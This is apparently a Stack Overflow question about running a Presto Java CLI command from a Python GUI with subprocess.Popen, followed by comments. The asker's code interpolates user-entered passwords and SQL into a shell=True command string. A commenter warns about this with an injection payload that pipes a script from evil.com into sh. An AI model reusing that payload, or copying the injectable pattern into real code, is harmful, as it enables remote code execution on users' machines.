# understanding the input to subprocess.Popen()

Tags: python, command-line, subprocess, command-line-interface

I want to run a few lines in commandline while using input from a GUI
I checked google and what I understand is that it's best to use subprocess.

I'm having a hard time understanding how to input my cli code into subprocess.Popen()

I want to run the following CLI code using the function I created below:

```
SET PRESTO_PASSWORD=XXXXX 
java -jar presto.jar --server https://address.to.server --catalog hive --debug --schema XXXX --user=XXXX --password --execute "SELECT * FROM TABLE;" --output-format CSV_HEADER > test.csv
echo done
```

I've created the code below but if i run it I only get the output:

```
output: b''
error: b''
```

(so I don't even see 'Done' as an output, even though I echo it at the end)
I'm sure that the CLI code is ok, I've ran it manually in CMD and I do get results.

What am I doing wrong? Below the function I use to execute the commands:

```
def calculate(): 
    def subprocess_cmd(command):
        process = subprocess.Popen(command,stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
        stdout, stderr = process.communicate()
        
        output = f'output: {stdout}'
        output_error = f'error: {stderr}'
        
        return output, output_error
    
    def update_output(output_string):
        output_sqlcode.configure(state='normal')
        output_sqlcode.insert('end', f'{output_string}\n')
        output_sqlcode.configure(state='disabled')

    label_output.grid(column=0, row=6, columnspan=4, pady=0)
    output_sqlcode.grid(column=0, row=7, columnspan=4, padx = 10, ipadx = 250, ipady=100,pady=10)

    usr_name = input_username.get()
    usr_pass = input_password.get()
    sql_code = input_sqlcode.get()
    file_name = 'test'
        
    cli_code = f'SET PRESTO_PASSWORD={usr_pass}; java -jar presto.jar --server {server_address} --catalog hive --debug --schema {schema_name}--user={usr_name} --password --execute "{sql_code};" --output-format CSV_HEADER > {file_name}.csv; echo done' 
    
    output, error = subprocess_cmd(cli_code)
        
    update_output(output)
    update_output(error)
```

**Update**
I think I found the reason why it is not working. I was running the script in a folder which is in the cloud (onedrive). Given that it uses CMD, it gave errors. I moved the folder to a different location but all my locations are UNC drives:

```
\\xx.xxx.net\xxx\xx\x\xx\xx\07 Personal\xxxx\file.py
```

Given that all my locations are like that, I need to find a way to run CMD with a UNC location. I tried using Pushd and Popd but that still gave me the UNC location error (probably because i'm trying to run pushd while i'm in UNC working directory?)

```
cli_code = f'Pushd {unc_location};SET PRESTO_PASSWORD={usr_pass}; java -jar presto.jar --server {server_address} --catalog hive --debug --schema {schema_name}--user={usr_name} --password --execute "{sql_code};" --output-format CSV_HEADER > {file_name}.csv; popd; echo done'
```

Comment: Possible that you need a space here "{schema_name}--user={usr_name}". If the command line version worked, Popen should work. You might want to sub subprocess.run instead.

Comment: You need to actually _read_ from a reader to see what data is on the other side. It's like `print()`ing a file object -- it doesn't show you the _content of the file_; you need to actually read that content.

Comment: `process.stdout.read()` -- though note that if you don't use `communicate()` you're prone to race conditions. But... why aren't you just using `communicate()`?

Comment: BTW, this code has serious security problems. What do you think happens if someone enters a password of `foo; curl http://evil.com/rootme.sh | sh` (or its Windows-y equivalent if this is a non-UNIX platform) in the `usr_pass` field?

Comment: (In general, using `shell=True` is a bad idea, and this is another example of why; you don't get those vulnerabilities if you don't have a shell -- better to pass the `PRESTO_PASSWORD` environment variable with the `Popen` argument `env`, and to have `cli_code` be an argument vector, not a string).

Comment: Thanks for all the comments.I'm quite new to all of this so I'm having a hard time understanding how to interpret your comments.

@CharlesDuffy: I have a few questions/comments: what do you mean by Pass the PRESTO_PASSWORD as Popen argument? Also, I would still have 2 lines of commands left. Regarding the security problems, unfortunately I don't have a lot of experience with how to solve these security problem, I am aware that it's far from secure right now. luckily it's a proof of concept which is not in prod. regarding communicate, I changed it, output is now
output: b''
error: b''

Comment: @AndrewHolmgren I tried adding the space but it didn't change the result. Also changing towards run instead of Popen gave the same result: 
output: b''
error: b''

Comment: @AndrewHolmgren I now see that it does create a .csv file but it's empty. Unfortunately the output from StdErr and Stdout don't give me anything to know why it isn't filling the csv file (also, I don't see the echo hello command in the output)

Comment: @eureka, if you get a bad result from `communicate()`, switching to `read()` won't fix it -- it can only possibly make it worse, not better. Try to fix that bug while still using `communicate()`.

Comment: ...as to what the bug _is_, though, I'd need to know a lot more to be able to be any help. Part of the point of a [mre] is to have code others can run to see the same problem; right now folks can't test your code without having `presto.jar`, without having a database for it to connect with, etc etc.

Comment: One question that's very important to understanding your code: What operating system is it running on? (The `SET` command isn't valid on UNIX systems running POSIX-compliant shells at all; it implies you're using something different, but we really should know what you're _actually_ using).

Comment: @CharlesDuffy I'm running on windows so the SET command should work there (and it does if i use the terminal). Regarding the bad result read, I'm not following. I switched towards communicate() as you explained it to be the better approach. However, I still don't get output from terminal, that should not be related to the jar, because if the jar wouldn't be there, the error that this would create would/should be the error output right?

Comment: Let us [continue this discussion in chat](https://chat.stackoverflow.com/rooms/232049/discussion-between-charles-duffy-and-eureka).